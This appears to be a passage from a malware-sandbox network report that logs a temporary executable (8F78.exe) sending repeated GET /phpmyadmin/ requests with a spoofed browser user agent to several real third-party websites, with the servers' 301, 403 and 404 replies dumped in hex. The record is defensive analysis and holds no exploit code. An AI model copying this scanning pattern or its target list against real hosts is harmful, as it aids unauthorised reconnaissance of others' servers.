                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                25192.168.2.45151283.167.249.74435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC271INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC263INData Raw: 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: fc<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.kompresory-servis.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                26192.168.2.45170581.0.206.1044435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: izberatel.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC199INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.izberatel.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                27192.168.2.45181346.229.230.1064435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eurisproagro.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC216INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 209
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC209INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                28192.168.2.45172559.106.13.824435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: oitacity.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC150INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC16234INData Raw: 35 62 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: 5bbb<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="ja"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content=
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC7262INData Raw: 4c 51 44 4b 52 74 34 78 63 6d 64 4a 51 6b 42 41 66 51 47 55 55 33 71 71 2b 64 52 66 71 30 33 73 48 4e 44 71 6a 30 51 6b 50 68 38 2b 6a 6f 53 45 6f 51 55 4a 67 4c 30 67 31 58 37 6a 55 6f 6b 47 59 5a 30 4f 55 5a 57 31 51 42 64 76 6b 2b 0a 46 49 42 56 4c 57 77 57 70 4b 77 45 6d 63 33 54 48 75 73 72 4a 55 75 52 65 59 54 69 30 4e 6e 73 72 49 75 31 54 42 4d 54 34 36 55 73 36 4c 79 6a 71 36 76 72 79 49 4f 56 30 39 4a 53 64 75 7a 59 71 76 66 70 59 32 4e 6a 46 79 2f 2b 74 72 53 30 0a 53 4d 34 4b 63 4e 33 36 2b 76 72 42 73 64 4d 51 57 4a 46 62 53 66 76 33 37 31 48 61 69 51 6a 73 65 4f 7a 59 32 33 2f 35 79 79 6c 62 4f 55 32 35 77 77 6f 73 43 46 78 34 34 73 52 37 47 76 66 4d 77 64 77 49 6a 77 67 62 48 36 4e 77 35 2b 44 67 0a 6f 4d 6c 6b 43 67 30 4e 4e 54 59 30 33 64
                                                                                                                                                                                                                                                                                                                                Data Ascii: LQDKRt4xcmdJQkBAfQGUU3qq+dRfq03sHNDqj0QkPh8+joSEoQUJgL0g1X7jUokGYZ0OUZW1QBdvk+FIBVLWwWpKwEmc3THusrJUuReYTi0NnsrIu1TBMT46Us6Lyjq6vryIOV09JSduzYqvfpY2NjFy/+trS0SM4KcN36+vrBsdMQWJFbSfv371HaiQjseOzY23/5yylbOU25wwosCFx44sR7GvfMwdwIjwgbH6Nw5+DgoMlkCg0NNTY03d


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                29192.168.2.45172259.106.13.824435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: oitacity.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC150INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC16234INData Raw: 35 62 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: 5bbb<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="ja"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content=
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC7262INData Raw: 4c 51 44 4b 52 74 34 78 63 6d 64 4a 51 6b 42 41 66 51 47 55 55 33 71 71 2b 64 52 66 71 30 33 73 48 4e 44 71 6a 30 51 6b 50 68 38 2b 6a 6f 53 45 6f 51 55 4a 67 4c 30 67 31 58 37 6a 55 6f 6b 47 59 5a 30 4f 55 5a 57 31 51 42 64 76 6b 2b 0a 46 49 42 56 4c 57 77 57 70 4b 77 45 6d 63 33 54 48 75 73 72 4a 55 75 52 65 59 54 69 30 4e 6e 73 72 49 75 31 54 42 4d 54 34 36 55 73 36 4c 79 6a 71 36 76 72 79 49 4f 56 30 39 4a 53 64 75 7a 59 71 76 66 70 59 32 4e 6a 46 79 2f 2b 74 72 53 30 0a 53 4d 34 4b 63 4e 33 36 2b 76 72 42 73 64 4d 51 57 4a 46 62 53 66 76 33 37 31 48 61 69 51 6a 73 65 4f 7a 59 32 33 2f 35 79 79 6c 62 4f 55 32 35 77 77 6f 73 43 46 78 34 34 73 52 37 47 76 66 4d 77 64 77 49 6a 77 67 62 48 36 4e 77 35 2b 44 67 0a 6f 4d 6c 6b 43 67 30 4e 4e 54 59 30 33 64
                                                                                                                                                                                                                                                                                                                                Data Ascii: LQDKRt4xcmdJQkBAfQGUU3qq+dRfq03sHNDqj0QkPh8+joSEoQUJgL0g1X7jUokGYZ0OUZW1QBdvk+FIBVLWwWpKwEmc3THusrJUuReYTi0NnsrIu1TBMT46Us6Lyjq6vryIOV09JSduzYqvfpY2NjFy/+trS0SM4KcN36+vrBsdMQWJFbSfv371HaiQjseOzY23/5yylbOU25wwosCFx44sR7GvfMwdwIjwgbH6Nw5+DgoMlkCg0NNTY03d


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                30192.168.2.45280483.167.249.74435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC271INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:24 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC263INData Raw: 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: fc<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.kompresory-servis.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                31192.168.2.45279781.0.206.1044435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: izberatel.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC199INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:24 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.izberatel.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                32192.168.2.45280283.167.249.74435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC271INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:24 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC263INData Raw: 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: fc<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.kompresory-servis.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                33192.168.2.45280783.167.249.74435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC271INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:24 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
